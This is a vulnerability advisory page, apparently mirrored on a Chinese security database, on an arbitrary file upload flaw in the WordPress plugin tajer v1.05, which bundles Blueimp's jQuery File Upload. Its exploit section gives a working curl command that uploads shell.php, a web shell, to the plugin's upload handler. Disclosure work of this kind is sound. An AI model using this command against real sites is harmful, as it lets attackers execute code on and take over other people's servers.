WordPress Plugin tajer v1.05 Arbitrary file upload vulnerability - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1357683 漏洞类型
发布时间 2018-10-18 更新时间 2018-10-18
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018100153
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Title: Arbitrary file upload vulnerability in WordPress Plugin tajer v1.05
Author: Larry W. Cashdollar, @_larry0
Date: 2018-10-15
[CVE-2018-9206]
Download Site: https://wordpress.org/plugins/tajer
Vendor: https://mostasharoon.org/
Vendor Notified: no
Vendor Contact:
Advisory: http://www.vapidlabs.com/advisory.php?v=205
Description: Tajer – All In One eCommerce WordPress Premium Class Plugin.
You can sell any kind of digital goods: downloads, articles, a piece of content or any kind of content or virtual products.
Vulnerability:
This plugin has components of Blueimp's jQuery file upload that is vulnerable to arbitrary file upload and code execution.

Exploit Code:
curl   -F "files=@shell.php" http://192.168.0.47/wp-content/plugins/tajer/lib/jQuery-File-Upload-master/server/php/index.php